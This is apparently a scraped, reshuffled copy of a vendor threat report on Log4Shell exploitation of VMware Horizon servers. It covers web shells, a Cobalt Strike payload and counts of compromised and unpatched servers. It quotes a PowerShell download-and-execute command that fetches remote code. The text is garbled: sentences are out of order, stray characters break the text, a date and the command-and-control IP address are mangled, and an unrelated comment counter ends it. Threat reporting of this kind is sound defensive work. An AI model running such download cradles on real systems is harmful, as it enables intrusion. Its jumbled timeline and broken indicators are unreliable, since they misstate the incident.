This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes. Iex ((New-Object ).DownloadString('116:8080/drv'))Īt 1938 ET, we started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This time it was used to deliver the Cobalt Strike implant.Īdditional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time-confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83116 for command and control. On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to new exploitation of the Log4Shell vulnerability in VMware Horizon. the web shells on these 18 compromised systems established a timeline that started on Decemand continued until December 29, 2021. It’s important to note that ~34% of the 180 Horizon servers (62) we analyzed were unpatched and internet-facing at the time of this publication. Our team is continuing to track this activity and this post will be updated with new information as it becomes available.īased on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell.
According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges). On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells.
0 kommentar(er)
